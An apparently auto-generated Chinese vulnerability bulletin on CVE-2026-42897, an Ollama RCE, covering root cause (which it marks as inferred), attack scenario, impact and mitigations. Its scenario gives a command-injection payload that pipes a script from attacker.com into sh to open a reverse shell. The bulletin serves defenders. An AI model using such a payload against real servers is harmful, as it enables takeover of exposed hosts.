Exploit for CVE-2026-42897 exploit
🔥 热门漏洞情报 · Sploitus · 2026-05-15
Exploit for CVE-2026-42897 exploit
Critical · CVSS 9.8
远程代码执行(RCE)
CVE-2026-42897
📋 漏洞概述
CVE-2026-42897 为 Ollama 远程代码执行漏洞,攻击者可利用特制请求实现未授权 RCE。
📋 基础信息
| 受影响版本 | Ollama < 0.17.1 |
| 漏洞类型 | 远程代码执行(RCE) |
| CVSS | 9.8 · Critical |
| CVE | CVE-2026-42897 |
🔬 漏洞根因
漏洞源于 Ollama API 对用户输入的模型名称或路径参数未进行充分验证与过滤。攻击者可以通过构造包含路径穿越或系统命令注入的恶意载荷,触发服务端执行非预期的系统调用。推测根本缺陷在于 API 处理 `create` 或 `pull` 接口时,将用户可控字符串直接拼接到命令行或文件操作中,导致命令注入或任意文件写入。
🎯 攻击场景
1. 攻击者扫描互联网上暴露的 Ollama 服务(默认端口 11434)。 2. 发送特制的 HTTP POST 请求到 `/api/create`,其中 `modelfile` 参数包含恶意命令,例如利用 `FROM` 指令嵌入 `|| curl http://attacker.com/shell.sh | sh`。 3. 服务端在未进行充分清理的情况下,将该输入传递到底层 shell 或文件系统操作中。 4. 触发远程命令执行,下载并执行反向 shell 脚本。 5. 攻击者获得目标服务器的 shell 控制权,实现完全接管。
💥 漏洞影响
攻击者可远程执行任意系统命令,实现完全控制受影响服务器。可能导致数据泄露、勒索软件部署、横向移动、以及被用于后续攻击跳板。由于 Ollama 通常以高权限运行,影响范围包括所有暴露在公网或可被内部网络访问的 Ollama 服务实例。
🛡️ 修复建议
1. 立即将 Ollama 升级至 0.17.1 或更高版本。 2. 临时缓解措施:在防火墙或反向代理层限制对 Ollama API 端点的访问,仅允许受信任 IP;禁用不必要的 `create`、`push`、`pull` 等写操作接口;使用 Web 应用防火墙(WAF)规则拦截包含 shell 元字符的请求。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-42897
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42897
- 原始来源(Sploitus)
🚨 威胁评估
| 📈 EPSS 利用概率 | 低 (0.2%) (高于 44.5% 的漏洞) |
| 🚨 CISA KEV | 🚨 已被积极利用 |
| 🔧 公开 PoC | 1 个公开 PoC 仓库 |
⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-05-17 08:05 | 来源: Sploitus